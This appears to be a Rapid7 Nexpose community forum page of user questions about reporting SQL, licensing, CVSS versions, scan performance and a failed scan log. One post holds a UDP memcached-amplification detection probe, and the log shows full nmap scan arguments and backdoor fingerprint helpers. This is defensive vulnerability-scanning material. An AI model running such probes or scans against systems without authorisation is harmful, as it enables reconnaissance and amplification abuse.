Hi, I am looking for an SQL query that will pull the top 25 remediation's from Nexpose and correlate those top 25 remediation's with assets. I was provided with the following query by rapid 7: SELECT ds.summary AS "Solution Summary", proofAsText(ds.fix) AS "Solution Steps", array_to_string(array_agg(da.ip_address), ', ') AS "IP Addresses", array_to_string(array_agg(http://da.host _name),', ') AS "Host Names" FROM fact_remediation(25, 'riskscore DESC') AS fr JOIN dim_solution AS ds ON fr.solution_id = ds.solution_id JOIN dim_asset_vulnerability_solution davs ON fr.solution_id = davs.solution_id JOIN dim_asset AS da ON davs.asset_id = da.asset_id GROUP BY ds.summary, ds.fix The problem with this query is that it does not line up with the top 25 remediation's pdf report in Nexpose and the count of assets associated with that remediation are not the same as in the pdf. I have attempted writing my own query using the following schema: https://help.rapid7.com/nexpose/en-us/warehouse/warehouse-schema.html However when I attempt to look up data from fact tables in the schema, Nexpose says the table does not exist. Can someone please provide a resource to an up to date Nexpose Schema and Provide a top 25 remediation's query that will line up with the top 25 remediation's pdf report in Nexpose? Thank you.
Posted by George about a year ago
Our InsightVM console is alerting for: You've used over 110% of your licensed assets which may impact the performance of the product. Please contact your Rapid7 CSM to increase your license. We already increased our licenses to cover ALL assets in our organization. Need help checking on this.
Posted by Marco Lisboa about a year ago
I have been working on and testing the following check (text content to be improved). The following has been working well so far in my test environment. I have seen at least response instance where I did not receive a STAT command back but it was early in my testing so it may have been a poorly formed request on my end. What I'm running into within my test environment is that the memcached service on 11211 is only showing as TCP in the UI and the system is listening on 11211/udp and tcp on the test server. The check below (unless I miss-understand the logic) should only trigger if the query is successful on UDP. The signature is firing and the proof shows 11211 TCP. If the same port 11211 is available on both TCP and UDP does the UI fail to show one or does my check potentially have an error? I'm also looking to see if the XML schema has any hints to further restrict the NetworkService to be UDP only. *I'm open to any improvements. ``` <VulnerabilityCheck id="cmty-memcached-amplification" scope="endpoint" potential="0"> <NetworkService type="memcached"/> <UDPCheck> <UDPRequestResponse> <UDPRequest><value format="base64">AAEAAAABAABzdGF0cw0KCg==</value></UDPRequest> <UDPResponse><regex ctags="REG_DOT_NEWLINE,REG_MULTILINE">STAT</regex></UDPResponse> </UDPRequestResponse> </UDPCheck> </VulnerabilityCheck> ``` [cmty-memcached-amplification.xml](https://github.com/BrianWGray/cmty-nexpose-checks/blob/master/cmty-memcached-amplification.xml) [cmty-memcached-amplification.vck](https://github.com/BrianWGray/cmty-nexpose-checks/blob/master/cmty-memcached-amplification.vck) [memcached-restrict.sol](https://github.com/BrianWGray/cmty-nexpose-checks/blob/master/memcached-restrict.sol)
Posted by BrianWGray about a year ago
We trying to update older Nexpose Appliance from ubantu version 8 to 10 so we can at least get it to version 12 via a usb drive. When we power up the appliance it run thru POST and all we get is cursor on the monitor and on the display system bootup message. Is their any options of rebuilding the server?
Posted by Alfredo Martinez about a year ago
Hello, I am researching what CVSS version is being reported in my reports on Nexpose. When I manually view asset vulnerabilities in the console, I see a v2 and a v3 of the CVSS. Are my reports (the default Nexpose reports) reflecting the CVSS v2 or is it the v3? I looked into writing my own SQL query and I found (dv.cvss_score) but again I am not sure if that is v2 or v3. Any help is appreciated. My goal is to make sure my reports are reflecting v2 only and not v3. Thank you, Scott
Posted by Scott Walker about a year ago
There is a question about the scan delay of Nexpose. I have previously sent inquiries regarding the delay in scanning speed. I know I need to modify the Discovery Performance values in the scan template settings to improve the scan speed. However, there was no difference in scan speed when the Discovery Performance values were modified. I wonder if there are any factors that could affect Nexpose's scan performance apart from Discovery Performance values. I would also like to ask if you can solve this problem.
Posted by yryim about a year ago
Looking for some assistance with this incident that is appearing on several of our systems. Proof: Vulnerable OS: Microsoft Windows Server 2008 R2, Datacenter Edition SP1 Microsoft patch KB4025337 installed According to the Microsoft Security Guidance, updated patches were released in September. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8529 This particular system has both the September IE11 Cumulative Update installed, as well as the Security only update rollup. The vulnerability proof is calling out that a particular patch is installed. While there were issues with that patch, several patches superseded it. I'm not sure where to start at trying to resolve this.
Posted by Mark Payne about a year ago
Issues with Nexpose community trial. Here's log: 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] Logging initialized. [Name = scanLogger-2] [Level = INFO, WARN, ERROR] [Timezone = America/New_York (Eastern Standard Time, GMT-5:00)] 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Scan for site xxxxxxx.com started by policysup. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Debug logging is not enabled for this scan. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] ACES logging is not enabled. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Enabling of Windows Services is off. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Invulnerable Data Storage is on. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Nmap Host Discovery Ignore TCP Reset is off. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Nmap ARP Ping for local networks is on. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] [Engine ID: 3(local)] Checking if engine is online. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] [Engine ID: 3(local)] Engine is online. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Scan for site xxxxxxx.com started by policysup. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Initializing alerters. 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] [Scan ID: 2] Starting scan against xxxxxxx.com with scan template: full-audit-without-web-spider. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Initializing alerters. 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan engine hostname: DESKTOP-CJUFJQT/192.168.1.74 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan engine serial number: 5CCE875D314BBF7CF792EB8FE72BFF5D1740BEF9 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan engine version: 6.5.7 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Last product update ID: 4239920555 (2018-02-22) 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Last content update ID: 3471063746 (2018-02-20) 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Last auto content update ID: 1580990612 (2018-02-28) 2018-03-01T02:14:46 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loading plugins. 2018-03-01T02:14:50 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing WindowsPolicyScanner policy scans. 2018-03-01T02:14:50 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing NotesPolicyScanner policy scans. 2018-03-01T02:14:50 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing web scans. 2018-03-01T02:14:51 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing OraclePolicyScanner policy scans. 2018-03-01T02:14:51 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.nse.CheckProcessor.disableVulnerabilityCheckSynchronization is not configured - returning default value true. 2018-03-01T02:14:54 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 28 Jess rules in module ACCTSCAN 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 38745 Jess rules in module VULNSCAN 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 0 Jess rules in module DOSSCAN 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 38773 Jess rules from 355849 vulnerability checks 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Creating network scanning globals. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Creating default services mapper with default-services.properties. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Creating VMware update mapper with: C:\Program Files\rapid7\nexpose\plugins\java\1\VMwarePatchScanner\1\update-id.properties 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded 160 built-in trusted certificates. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.net.protocol.fingerprinter.timeout is not configured - returning default value 3600000. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.net.protocol.fingerprinter.socketExceptionLimit is not configured - returning default value 7. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.net.protocol.fingerprinter.minimumPreference is not configured - returning default value 0.0. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Windows Command Shell 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Quake3 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DHCP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: TDS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: RSH 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NNTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Shell Backdoor 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Unreal Tournament 2003 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: VMware Authentication Daemon 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: timeserver 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SymScanEngSSL_50 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NAT-PMP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: H.323 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: IMAP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: LDAP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Microsoft Exchange Routing 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Back Orifice 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: XFS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SerComm Config 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Oracle TNS Listener 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Novell Netware 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: FTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: mDNS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: HTTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Check Point Topology 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Mydoom 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: BGP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: UUCP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: AS/400 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NetBus v2 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Postgres 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Back Orifice 2000 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SMTPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DCE RPC 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Kerberos 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: ASF-RMCP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: RPC 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Quote of the Day 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SIPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SMTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: CVS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Character Generator 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Shell Backdoor over SSL 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Telnet 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: HP Data Protector 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NNTPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: FTPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: MySQL 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Zotob Worm FTP Daemon 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SIP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: UPnP-HTTPU 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: POP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: CIFS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: CIFS Name Service 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SubSeven Trojan 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Rapid7 Agent 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DNS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NetBus v1 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: pcAnywhere 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Canon Uniflow CPCA 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: XWindows 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Rsync 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NDMP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Trin00 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: UPnP over HTTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: POPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: HP JetDirect Data 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: daytime 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Microsoft SQL Server 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: RMI 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: discard 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DCE-RPC over HTTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: IMAPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Zincite 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: LDAPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DB2 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SSH 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: CCTV-DVR 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: ISAKMP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: TFTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: echo 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SNMP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: AFP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: WDBRPC 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Lotus Notes 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: finger 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NFS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: PPTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Sasser backdoor FTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: LPD 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: VNC 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Steam 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: HTTPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: RTSP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol helper framework factory version: 1.1 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol helper framework factory version: 1.0 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: Crimson v3 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: ident 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded verbose XML protocol fingerprint: ident 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: memcached 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: memcached 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: mongodb 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: Oracle Services for Microsoft Transaction Server 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: ormi 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: ProRat Server 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: RDP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: Smart Install 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: Service Location 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan startup took 58 seconds 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Non-EPSEC scan 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.isEnabled is not configured - returning default value true. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.expressionsEvaluatorFrequency is not configured - returning default value 60000. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.tcpPort.connectTimeout is not configured - returning default value 30000. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.tcpPort.remoteClosedTimeout is not configured - returning default value 500. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.tcpPort.failureLimit is not configured - returning default value 3. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.networkNode.concurrencyLimit is not configured - returning default value 8. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.networkNode.failureLimit is not configured - returning default value 32. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] NMAP: IPV4 ARGUMENTS: C:\Program Files\rapid7\nexpose\nse\nmap\nmap.exe --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 -sS -sU -O --osscan-guess --max-os-tries 1 -p T:1-1040,1080,1125,1194,1214,1220,1352,1433,1500,1503,1521,1524,1526,1720,1723,1731,1812-1813,1953,1959,2000,2002,2030,2049,2100,2200,2222,2301,2381,2401,2433,2456,2500,2556,2745,3000-3001,3121,3127-3128,3230-3235,3268-3269,3306,3339,3389,3460,3527,4000,4045,4100,4242,4430,4443,4661-4662,4711,4786,4848,5000,5010,5059-5061,5101,5180,5190-5193,5250,5432,5554-5555,5560,5566,5631,5678,5800-5803,5900-6009,6101,6106,6112,6346,6588,6777,7001-7002,7070,7100,7510,7777-7778,8000-8001,8004-8005,8008,8080-8083,8098-8100,8180-8181,8383-8384,8443-8444,8470-8480,8500,8866,8888,9090,9100-9102,9343,9470-9476,9480,9495,9996,9999-10000,10025,10168,11211,12345-12346,13659,16080,18181-18185,18207-18208,18231-18232,19190-19191,20034,22226,27017,27374,27665,31337,32764,32771,33333,49152,49400,50000,51080,51443,54320,60000,60148,63148,U:7,9,11,13,17,19,37,53,67-69,88,111,123,135,137-139,161-162,177,213,259-260,445,464,500,514,520,523,623,631,749-751,1194,1434,1701,1812-1813,1900,2049,2746,3230-3235,3401,4045,4500,4665-4666,4672,5059-5061,5351,5353,5632,6429,7777,9100-9102,11211,17185,18233,23945,26000-26004,26198,27015-27030,27444,27960-27964,30720-30724,31337,32771,34555,44400,47545,49152,54321 --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 -oX - -v 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] NMAP: IPV6 ARGUMENTS: C:\Program Files\rapid7\nexpose\nse\nmap\nmap.exe --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 -sS -sU -O --osscan-guess --max-os-tries 1 -p T:1-1040,1080,1125,1194,1214,1220,1352,1433,1500,1503,1521,1524,1526,1720,1723,1731,1812-1813,1953,1959,2000,2002,2030,2049,2100,2200,2222,2301,2381,2401,2433,2456,2500,2556,2745,3000-3001,3121,3127-3128,3230-3235,3268-3269,3306,3339,3389,3460,3527,4000,4045,4100,4242,4430,4443,4661-4662,4711,4786,4848,5000,5010,5059-5061,5101,5180,5190-5193,5250,5432,5554-5555,5560,5566,5631,5678,5800-5803,5900-6009,6101,6106,6112,6346,6588,6777,7001-7002,7070,7100,7510,7777-7778,8000-8001,8004-8005,8008,8080-8083,8098-8100,8180-8181,8383-8384,8443-8444,8470-8480,8500,8866,8888,9090,9100-9102,9343,9470-9476,9480,9495,9996,9999-10000,10025,10168,11211,12345-12346,13659,16080,18181-18185,18207-18208,18231-18232,19190-19191,20034,22226,27017,27374,27665,31337,32764,32771,33333,49152,49400,50000,51080,51443,54320,60000,60148,63148,U:7,9,11,13,17,19,37,53,67-69,88,111,123,135,137-139,161-162,177,213,259-260,445,464,500,514,520,523,623,631,749-751,1194,1434,1701,1812-1813,1900,2049,2746,3230-3235,3401,4045,4500,4665-4666,4672,5059-5061,5351,5353,5632,6429,7777,9100-9102,11211,17185,18233,23945,26000-26004,26198,27015-27030,27444,27960-27964,30720-30724,31337,32771,34555,44400,47545,49152,54321 --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 -oX - -v -6 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Nmap phase started. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Nmap will scan 1024 IP addresses at a time. 2018-03-01T02:15:38 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Nmap scan of 1 IP address starting. 2018-03-01T02:15:39 [INFO] [Thread: Scan 2:nmap:stdin] [Site: xxxxxxx.com] Nmap task Ping Scan started. 2018-03-01T02:15:45 [WARN] [Thread: Scan 2:nmap:stdin] [Site: xxxxxxx.com] NMAP: EXCEPTION: STDIN: java.io.IOException: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[11,1] Message: XML document structures must start and end within the same entity. at com.rapid7.nexpose.scan.nmap.xml.NmapXMLOutputCallback.handle(Unknown Source) ~[nxshared.jar:na] at com.rapid7.nexpose.scan.nmap.NmapInputStreamRunnable.run(Unknown Source) [nxshared.jar:na] at java.lang.Thread.run(Thread.java:745) [na:1.8.0_102] Caused by: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[11,1] Message: XML document structures must start and end within the same entity. at com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl.next(XMLStreamReaderImpl.java:596) ~[na:1.8.0_102] at com.rapid7.xml.stax.XMLStreamReaderHelper.getNextSiblingElement(Unknown Source) ~[r7shared.jar:na] ... 3 common frames omitted 2018-03-01T02:15:45 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] NMAP: PROCESS: EXIT VALUE: 255 2018-03-01T02:15:45 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan failed: java.io.IOException: The Nmap exit value is not zero: 255 at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source) at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source) at 